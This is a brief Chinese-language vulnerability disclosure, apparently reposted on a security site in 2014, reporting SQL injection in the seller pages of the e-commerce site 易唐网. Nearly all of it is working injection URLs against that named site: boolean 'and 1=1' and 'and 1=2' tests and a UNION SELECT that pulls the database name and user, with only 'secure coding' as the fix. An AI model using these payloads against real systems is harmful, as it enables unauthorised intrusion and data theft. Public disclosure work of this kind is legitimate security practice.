易唐网卖家网站SQL注入下载
-
来源:黑吧安全网 浏览:754次 时间:2014-06-12
易唐网卖家网站SQL注入电子商务网站易唐网卖家网站存在SQL注入漏洞
比较典型的Mysql数据库SQL注入,
http://www.tradetang.com.cn/view.php?act=notice&tp=notice&id=73 and 1=1--
http://www.tradetang.com.cn/view.php?act=notice&tp=notice&id=73 and 1=2--
页面显示不同
http://www.tradetang.com.cn/view.php?act=notice&tp=notice&id=73 and 1=2 union%20select%20database(),user()--

修复方案:
安全编码
上一篇: [公开漏洞]人人网某分站SQL注入漏洞